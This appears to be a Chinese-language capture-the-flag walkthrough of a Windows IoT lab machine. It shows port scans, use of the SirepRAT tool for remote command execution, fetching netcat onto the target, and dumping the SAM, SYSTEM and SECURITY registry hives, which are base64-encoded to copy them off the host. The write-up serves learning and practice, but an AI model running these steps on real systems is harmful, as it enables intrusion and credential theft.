135/tcp   open  msrpc
5985/tcp  open  wsman
8080/tcp  open  http-proxy
| http-auth:
| HTTP/1.1 401 Unauthorized\\x0D
|_  Basic realm=Windows Device Portal
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  unknown
29820/tcp open  unknown


nc 10.129.2.27 29819
PING

nc 10.129.2.27 29820
*LY`G﹎蓕萇

搜索指纹确定是SirepRAT。

<https://github.com/SafeBreach-Labs/SirepRAT>

找到github工具安装利用。

python SirepRAT.py 10.129.2.27 GetSystemInformationFromDevice
<SystemInformationResult | type: 51, payload length: 32, kv: {'dwOSVersionInfoSize': 0, 'dwMajorVersion': 10, 'dwMinorVersion': 0, 'dwBuildNumber': 17763, 'dwPlatformId': 2, 'szCSDVersion': 0, 'wServicePackMajor': 1, 'wServicePackMinor': 2, 'wSuiteMask': 0, 'wProductType': 0, 'wReserved': 0}>

image-20220417135938730

image-20220417135938730

测试确实存在该漏洞,于是直接利用。

这里下载nc时用certutil和system.net.webclient失败了,于是用powershell的invoke-webrequest。

image-20220417142127594

image-20220417142127594

C:\\Data\\Users>echo %username%
echo %username%
DefaultAccount
没有whoami,用环境变量确定当前用户

image-20220417144323255

image-20220417144323255

添加一个admin用户,但这里貌似需要uac,常用的都说不符合windows版本,卡了一段时间。第二天重启发现环境变化了,用户变成omni,当前使用者变成system了。。。就挺无语

然后查看root.txt发现是System.Management.Automation.PSCredential加密,于是dump,mimikatz这些工具都执行不了,就转存了。

image-20220418174943463

image-20220418174943463

reg save HKLM\\sam (system) (security)
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\\data\\users\\public\\sam (system) (security)"))  把文件b64然后复制到本地,太大就用nc传
[IO.File]::WriteAllBytes("sam", [Convert]::FromBase64String([char[]][IO.File]::ReadAllBytes("sam.txt"))) //还原编码

image-20220418184812419

image-20220418184812419

image-20220418210834064

image-20220418210834064